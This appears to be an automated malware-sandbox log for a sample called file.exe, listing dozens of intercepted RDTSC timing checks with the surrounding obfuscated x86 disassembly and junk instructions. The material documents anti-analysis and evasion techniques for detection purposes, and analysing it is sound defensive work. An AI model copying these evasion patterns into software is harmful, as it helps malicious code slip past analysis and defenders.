              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF52FF second address: AF5327 instructions: 0x00000000 rdtsc 0x00000002 je 00007FABF0F31B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FABF0F31B55h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF5327 second address: AF5372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FABF0D685FEh 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e jc 00007FABF0D685FCh 0x00000014 jno 00007FABF0D685F6h 0x0000001a jbe 00007FABF0D6860Ch 0x00000020 jmp 00007FABF0D68606h 0x00000025 popad 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d push ecx 0x0000002e pop ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF5372 second address: AF5377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF5377 second address: AF537C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF3C54 second address: AF3C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF3C58 second address: AF3C5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF3C5C second address: AF3C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF3C69 second address: AF3C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF3C6D second address: AF3C71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF548D second address: AF5493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF5493 second address: AF549A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF55CD second address: AF55D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF915F second address: AF9163 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF9163 second address: AF9169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF9169 second address: AF9170 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF9170 second address: AF918F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jg 00007FABF0D685F6h 0x0000000e jmp 00007FABF0D685FFh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF941B second address: AF9420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFA3A6 second address: AFA3F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FABF0D685F6h 0x0000000a popad 0x0000000b jnl 00007FABF0D685FCh 0x00000011 popad 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 jmp 00007FABF0D685FAh 0x0000001b pop eax 0x0000001c mov esi, dword ptr [ebp+122D1AA3h] 0x00000022 call 00007FABF0D685F9h 0x00000027 push ebx 0x00000028 pushad 0x00000029 jmp 00007FABF0D68600h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFA3F0 second address: AFA43A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edi 0x00000008 jg 00007FABF0F31B5Dh 0x0000000e pop edi 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007FABF0F31B55h 0x00000018 mov eax, dword ptr [eax] 0x0000001a jc 00007FABF0F31B54h 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFA43A second address: AFA440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFA440 second address: AFA45F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FABF0F31B50h 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFA793 second address: AFA798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFA798 second address: AFA7C2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FABF0F31B57h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jl 00007FABF0F31B46h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFA7C2 second address: AFA7C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFB096 second address: AFB09A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFB95F second address: AFB980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FABF0D68609h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFB980 second address: AFB9BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FABF0F31B46h 0x00000009 jmp 00007FABF0F31B55h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 mov si, cx 0x00000015 push 00000000h 0x00000017 add edi, 243983D7h 0x0000001d push 00000000h 0x0000001f add dword ptr [ebp+122D3552h], ebx 0x00000025 push eax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFC36A second address: AFC390 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jo 00007FABF0D685F6h 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FABF0D68604h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFDDD7 second address: AFDDDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFE935 second address: AFE939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0183E second address: B01842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B01F9F second address: B01FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FABF0D685FBh 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B04F70 second address: B04F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02754 second address: B02758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B05430 second address: B054F2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D3674h], ecx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FABF0F31B48h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c call 00007FABF0F31B4Bh 0x00000031 mov edi, dword ptr [ebp+122D3435h] 0x00000037 pop ebx 0x00000038 call 00007FABF0F31B59h 0x0000003d jmp 00007FABF0F31B55h 0x00000042 pop ebx 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push ebx 0x00000048 call 00007FABF0F31B48h 0x0000004d pop ebx 0x0000004e mov dword ptr [esp+04h], ebx 0x00000052 add dword ptr [esp+04h], 0000001Ah 0x0000005a inc ebx 0x0000005b push ebx 0x0000005c ret 0x0000005d pop ebx 0x0000005e ret 0x0000005f mov ebx, dword ptr [ebp+122D2D0Ch] 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 jmp 00007FABF0F31B58h 0x0000006e jnl 00007FABF0F31B46h 0x00000074 popad 0x00000075 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B054F2 second address: B054F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B065FE second address: B0660C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FABF0F31B46h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B066D2 second address: B066D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B076F6 second address: B076FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B06820 second address: B06827 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B076FA second address: B07758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+1247A159h], edx 0x00000010 mov bx, cx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FABF0F31B48h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Ch 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D2E86h], edi 0x00000035 push 00000000h 0x00000037 mov ebx, esi 0x00000039 xchg eax, esi 0x0000003a push eax 0x0000003b push edx 0x0000003c jns 00007FABF0F31B58h 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B07758 second address: B0775E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B06937 second address: B0693C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0775E second address: B07762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09987 second address: B0998D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0998D second address: B09992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09992 second address: B09998 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0AA60 second address: B0AA66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09BB2 second address: B09BC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABF0F31B4Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0AA66 second address: B0AAF5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007FABF0D685F8h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 jmp 00007FABF0D685FDh 0x00000028 jnl 00007FABF0D68600h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007FABF0D685F8h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 00000019h 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a mov dword ptr [ebp+1247A159h], edx 0x00000050 jmp 00007FABF0D685FAh 0x00000055 push ecx 0x00000056 sbb di, C74Fh 0x0000005b pop ebx 0x0000005c push 00000000h 0x0000005e mov edi, dword ptr [ebp+122D1ABCh] 0x00000064 mov edi, dword ptr [ebp+122D29F8h] 0x0000006a xchg eax, esi 0x0000006b pushad 0x0000006c push esi 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0AAF5 second address: B0AAFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0AAFE second address: B0AB02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09CAA second address: B09CB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0BDC9 second address: B0BE48 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FABF0D685F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FABF0D68604h 0x00000011 nop 0x00000012 jmp 00007FABF0D68605h 0x00000017 push dword ptr fs:[00000000h] 0x0000001e mov ebx, dword ptr [ebp+124554B7h] 0x00000024 push ecx 0x00000025 jp 00007FABF0D685FBh 0x0000002b pop ebx 0x0000002c mov dword ptr fs:[00000000h], esp 0x00000033 xor dword ptr [ebp+122D187Dh], esi 0x00000039 mov ebx, ecx 0x0000003b mov eax, dword ptr [ebp+122D0049h] 0x00000041 mov dword ptr [ebp+124554B7h], edi 0x00000047 push FFFFFFFFh 0x00000049 mov edi, dword ptr [ebp+122D2B60h] 0x0000004f nop 0x00000050 je 00007FABF0D68600h 0x00000056 pushad 0x00000057 push eax 0x00000058 pop eax 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0BE48 second address: B0BE54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0BE54 second address: B0BE5E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FABF0D685F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0CD38 second address: B0CD4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0FB10 second address: B0FB14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0FB14 second address: B0FB1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B11BC8 second address: B11BD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B12BB0 second address: B12C24 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, edx 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FABF0F31B48h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 call 00007FABF0F31B55h 0x0000002d mov ebx, edx 0x0000002f pop ebx 0x00000030 push 00000000h 0x00000032 jmp 00007FABF0F31B4Dh 0x00000037 xchg eax, esi 0x00000038 jmp 00007FABF0F31B56h 0x0000003d push eax 0x0000003e push edx 0x0000003f jl 00007FABF0F31B4Ch 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0FC83 second address: B0FC89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0FD88 second address: B0FDA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0F31B54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B12D9C second address: B12DA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B12DA2 second address: B12DA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B12DA6 second address: B12DC1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jg 00007FABF0D685F6h 0x00000011 jng 00007FABF0D685F6h 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B13DE0 second address: B13DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B13EAD second address: B13EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B13EB1 second address: B13EBA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B13EBA second address: B13ED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FABF0D685FCh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B13ED1 second address: B13ED7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0DE92 second address: B0DEAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0D68602h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B14DB7 second address: B14DBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B14DBB second address: B14DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABEE3D second address: ABEE43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABEE43 second address: ABEE57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FABF0D685FAh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F7B1 second address: B1F7BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0F31B4Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F7BF second address: B1F7C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F27C second address: B1F283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F3C8 second address: B1F3CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B24F50 second address: B24F56 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B24F56 second address: B24F5B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B24F5B second address: B24F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 je 00007FABF0F31B4Eh 0x0000000e jno 00007FABF0F31B48h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push edi 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B24F79 second address: B24F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B25136 second address: B25151 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FABF0F31B4Bh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B25151 second address: B25160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABF0D685FBh 0x00000009 rdtsc
